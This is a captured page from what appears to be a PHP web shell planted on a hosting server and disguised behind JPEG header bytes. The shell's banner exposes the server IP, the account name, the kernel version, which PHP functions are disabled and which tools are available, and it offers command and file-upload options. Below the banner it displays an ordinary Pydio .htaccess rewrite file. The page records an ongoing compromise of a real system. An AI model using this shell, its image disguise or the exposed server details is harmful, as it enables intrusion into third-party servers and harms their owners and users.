����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 18.221.213.201 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /var/softaculous/mw19/../kimai/../presta178/../pydio/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<IfModule mod_rewrite.c> # You must set the correct values here if you want # to enable webDAV sharing. The values assume that your # Pydio installation is at http://yourdomain/ # and that you want the webDAV shares to be accessible via # http://yourdomain/shares/repository_id/ RewriteEngine on RewriteBase [[relativeurl_]] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule (.*) index.php [L] #Following lines seem to be necessary if PHP is working #with apache as CGI or FCGI. Just remove the # #See http://doc.tiki.org/WebDAV#Note_about_Apache_with_PHP_as_fcgi_or_cgi #RewriteCond %{HTTP:Authorization} ^(.*) #RewriteRule ^(.*) - [E=HTTP_AUTHORIZATION:%1] #Following lines may be necessary for a PHP-FPM setup # to make sure that authorization is transmitted. # Just remove the # at the beginning of the line #SetEnvIf Authorization "(.*)" HTTP_AUTHORIZATION=$1 </IfModule> AddType application/json .json